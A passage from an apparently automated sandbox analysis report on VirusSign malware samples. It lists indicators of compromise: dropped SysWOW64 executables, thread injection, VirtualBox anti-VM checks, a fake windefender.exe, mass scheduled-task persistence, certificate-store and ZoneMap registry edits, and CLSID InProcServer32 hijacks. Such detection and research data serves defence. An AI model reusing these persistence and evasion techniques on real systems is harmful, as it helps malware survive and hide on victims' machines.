C:\Windows\SysWOW64\Pjjlgp32.dll Bnlfomip.exe File opened for modification C:\Windows\SysWOW64\Ehnmbddl.exe Eimldl32.exe File created C:\Windows\SysWOW64\Jdkagm32.exe Jkbmng32.exe File created C:\Windows\SysWOW64\Dbbdfnog.exe Djgpblal.exe File created C:\Windows\SysWOW64\Eijidfjd.exe Ebpqhl32.exe File opened for modification C:\Windows\SysWOW64\Jdcelh32.exe Jjnqoo32.exe File opened for modification C:\Windows\SysWOW64\Lcndoa32.exe Lnalgjah.exe File created C:\Windows\SysWOW64\Omohbk32.dll Bfnnkeio.exe File opened for modification C:\Windows\SysWOW64\Ccdkji32.exe Cmjcmooi.exe File created C:\Windows\SysWOW64\Nlkemb32.exe Miliqf32.exe File created C:\Windows\SysWOW64\Koopkd32.dll Fifhpe32.exe File created C:\Windows\SysWOW64\Qoklgj32.dll Ijldiopl.exe File created C:\Windows\SysWOW64\Mqikidhq.exe Lklbanji.exe File created C:\Windows\SysWOW64\Emenko32.exe Efkfndgd.exe File opened for modification C:\Windows\SysWOW64\Ihmkamkf.exe Iqfcppkd.exe File opened for modification C:\Windows\SysWOW64\Qhbhon32.exe Qiohdadi.exe File opened for modification C:\Windows\SysWOW64\Ajmdep32.exe Acclheql.exe File opened for modification C:\Windows\SysWOW64\Bfddjqnm.exe Bcfhneoj.exe File opened for modification C:\Windows\SysWOW64\Eiobpf32.exe Ebejcloa.exe File created C:\Windows\SysWOW64\Fjakoh32.exe Fbjcnk32.exe File created C:\Windows\SysWOW64\Eomdfkdm.exe Emnhjpei.exe File opened for modification C:\Windows\SysWOW64\Finkeo32.exe Ffpoid32.exe File created C:\Windows\SysWOW64\Cpnidj32.exe Cjqqlc32.exe File created C:\Windows\SysWOW64\Hdcbpqom.exe Hkkngk32.exe File created C:\Windows\SysWOW64\Ecigap32.exe Elaopc32.exe File created C:\Windows\SysWOW64\Gfaaqelp.dll Mkcham32.exe File created C:\Windows\SysWOW64\Pkkbmo32.dll Pmeggp32.exe File opened for modification C:\Windows\SysWOW64\Mbpdnm32.exe Mlflabfj.exe File created C:\Windows\SysWOW64\Oeoiaf32.exe Oodadlgk.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
winmgr107.exedescription pid Process procid_target PID 4508 set thread context of 4248 4508 winmgr107.exe 150 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
Processes:
virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exedescription ioc Process File opened (read-only) \??\VBoxMiniRdrDN virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe -
Drops file in Program Files directory 4 IoCs
Processes:
virussign.com_1e903a364fd4c0d461993bc1db029e4b.exewinmgr107.exevirussign.com_2a07d4eba2de1b08de71e85e6f95c09c.exewinmgr107.exedescription ioc Process File created C:\Program Files\Common Files\System\symsrv.dll virussign.com_1e903a364fd4c0d461993bc1db029e4b.exe File created \??\c:\progra~1\common~1\system\symsrv.dll.000 winmgr107.exe File created C:\Program Files\7-Zip\7zFM.exe.tmp virussign.com_2a07d4eba2de1b08de71e85e6f95c09c.exe File created \??\c:\progra~1\common~1\system\symsrv.dll.000 winmgr107.exe -
Drops file in Windows directory 4 IoCs
Processes:
virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.execsrss.exedescription ioc Process File created C:\Windows\rss\csrss.exe virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\rss virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exepid Process 4660 sc.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 4972 powershell.exe 6604 powershell.exe 1464 powershell.exe 3548 powershell.exe 2224 powershell.exe 2300 powershell.exe 6072 powershell.exe 5692 powershell.exe 11128 powershell.exe 7720 powershell.exe 5092 powershell.exe 4672 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exepid pid_target Process procid_target 12020 11948 WerFault.exe 738 8284 6940 WerFault.exe 1074 6528 11372 WerFault.exe 1080 -
Creates scheduled task(s) 1 TTPs 64 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid Process 9504 schtasks.exe 9436 schtasks.exe 8896 schtasks.exe 11420 schtasks.exe 7524 schtasks.exe 8056 schtasks.exe 11360 schtasks.exe 9816 schtasks.exe 8992 schtasks.exe 6148 schtasks.exe 10820 schtasks.exe 9744 schtasks.exe 9588 schtasks.exe 9932 schtasks.exe 3012 schtasks.exe 1356 schtasks.exe 4912 schtasks.exe 12152 schtasks.exe 8824 schtasks.exe 8124 schtasks.exe 11424 schtasks.exe 12088 schtasks.exe 5556 schtasks.exe 5136 schtasks.exe 3972 schtasks.exe 11844 schtasks.exe 11840 schtasks.exe 8396 schtasks.exe 6716 schtasks.exe 6240 schtasks.exe 5920 schtasks.exe 1752 schtasks.exe 6256 schtasks.exe 8100 schtasks.exe 12024 schtasks.exe 8820 schtasks.exe 9444 schtasks.exe 5380 schtasks.exe 3028 schtasks.exe 8676 schtasks.exe 7776 schtasks.exe 8180 schtasks.exe 4180 schtasks.exe 11316 schtasks.exe 8296 schtasks.exe 4352 schtasks.exe 7656 schtasks.exe 10492 schtasks.exe 11596 schtasks.exe 3628 schtasks.exe 4676 schtasks.exe 1064 schtasks.exe 6308 schtasks.exe 6968 schtasks.exe 8612 schtasks.exe 10596 schtasks.exe 4496 schtasks.exe 10536 schtasks.exe 10264 schtasks.exe 7048 schtasks.exe 6224 schtasks.exe 4996 schtasks.exe 1216 schtasks.exe 11052 schtasks.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
Processes:
NETSTAT.EXEipconfig.exepid Process 7628 NETSTAT.EXE 7320 ipconfig.exe -
GoLang User-Agent 3 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
Processes:
description flow ioc HTTP User-Agent header 203 Go-http-client/1.1 HTTP User-Agent header 205 Go-http-client/1.1 HTTP User-Agent header 208 Go-http-client/1.1 -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exevirussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exewindefender.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-104 = "Central Brazilian Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-449 = "Azerbaijan Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time" virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-2162 = "Altai Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-448 = "Azerbaijan Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time" virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-182 = "Mountain Standard Time (Mexico)" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-152 = "Central America Standard Time" windefender.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-402 = "Arabic Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2941 = "Sao Tome Daylight Time" virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time" virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-1021 = "Bangladesh Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe -
Modifies registry class 64 IoCs
Processes:
Cfdgfh32.exeHahcieng.exeMbpdnm32.exeHlignm32.exeNmkkjddg.exeOjkkof32.exevirussign.com_0d1d052a017c095816dffa6e1789be93.exeOioomd32.exeBococe32.exeDfpmmmem.exeBkbcma32.exeAclehffd.exeHgahaeke.exeIgfale32.exeIgnngjdd.exeJkbmng32.exeKqflgn32.exeKknmjfje.exeMenpjhlk.exeOdelmlma.exeBamkjknc.exeNielge32.exeQiadia32.exeAjijjplo.exeFfccijeh.exeEbkpbfcq.exeLgopee32.exeAjkgppjl.exeIjldiopl.exePhmgjikm.exeOlennj32.exeAlojkfno.exeAeaajk32.exeFfcjcpid.exeOlmkio32.exePoggai32.exeIjigcpao.exePommpd32.exePhfaijae.exeIqfcppkd.exeMiecpgii.exeOodadlgk.exePihacb32.exeAadonbij.exeGpjjndcd.exeIdhepigl.exeMknofm32.exeOaejfgdl.exeHkfnae32.exeMqikidhq.exeBolbhp32.exeCddjledl.exeCfgaadad.exeGaemmgnl.exeJnjcjdin.exePlijen32.exeQiohdadi.exeFpbmboeq.exeHdnbjk32.exeQkpmac32.exeDmkldm32.exeHdcbpqom.exeJhbdmm32.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ThreadingModel = "Apartment" Cfdgfh32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ = "C:\\Windows\\SysWow64\\Nmbcjjmb.dll" Hahcieng.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ThreadingModel = "Apartment" Mbpdnm32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ThreadingModel = "Apartment" Hlignm32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ThreadingModel = "Apartment" Nmkkjddg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32 Ojkkof32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32 virussign.com_0d1d052a017c095816dffa6e1789be93.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32 Oioomd32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ThreadingModel = "Apartment" Bococe32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ = "C:\\Windows\\SysWow64\\Lfpmai32.dll" Dfpmmmem.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ThreadingModel = "Apartment" Bkbcma32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ThreadingModel = "Apartment" Aclehffd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ThreadingModel = "Apartment" Hgahaeke.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ = "C:\\Windows\\SysWow64\\Fpeeakoa.dll" Igfale32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ThreadingModel = "Apartment" Ignngjdd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ = "C:\\Windows\\SysWow64\\Cmnkcepa.dll" Jkbmng32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32 Kqflgn32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ = "C:\\Windows\\SysWow64\\Nfqgge32.dll" Kknmjfje.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ThreadingModel = "Apartment" Menpjhlk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ = "C:\\Windows\\SysWow64\\Cbidlg32.dll" Odelmlma.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32 Bamkjknc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ = "C:\\Windows\\SysWow64\\Glcaao32.dll" Nielge32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ThreadingModel = "Apartment" Qiadia32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32 Ajijjplo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ = "C:\\Windows\\SysWow64\\Gbblppkd.dll" Ffccijeh.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ = "C:\\Windows\\SysWow64\\Mbgngfnn.dll" Ebkpbfcq.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ThreadingModel = "Apartment" Lgopee32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ThreadingModel = "Apartment" Ajkgppjl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32 Ijldiopl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ = "C:\\Windows\\SysWow64\\Niieokbp.dll" Phmgjikm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ThreadingModel = "Apartment" Olennj32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ = "C:\\Windows\\SysWow64\\Dcqneffc.dll" Alojkfno.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32 Aeaajk32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ThreadingModel = "Apartment" Ffcjcpid.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32 Olmkio32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32 Poggai32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32 Aclehffd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ = "C:\\Windows\\SysWow64\\Pdchnggp.dll" Ijigcpao.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ = "C:\\Windows\\SysWow64\\Jchfjp32.dll" Pommpd32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ = "C:\\Windows\\SysWow64\\Oacacc32.dll" Phfaijae.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ThreadingModel = "Apartment" Iqfcppkd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ThreadingModel = "Apartment" Miecpgii.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ = "C:\\Windows\\SysWow64\\Jbaell32.dll" Oodadlgk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ = "C:\\Windows\\SysWow64\\Lcojdnpf.dll" Pihacb32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32 Aadonbij.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ = "C:\\Windows\\SysWow64\\Ifneao32.dll" Gpjjndcd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ = "C:\\Windows\\SysWow64\\Mmefenpe.dll" Idhepigl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ = "C:\\Windows\\SysWow64\\Cbjopfpc.dll" Mknofm32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ThreadingModel = "Apartment" Oaejfgdl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ThreadingModel = "Apartment" Hkfnae32.exe Set value (str) 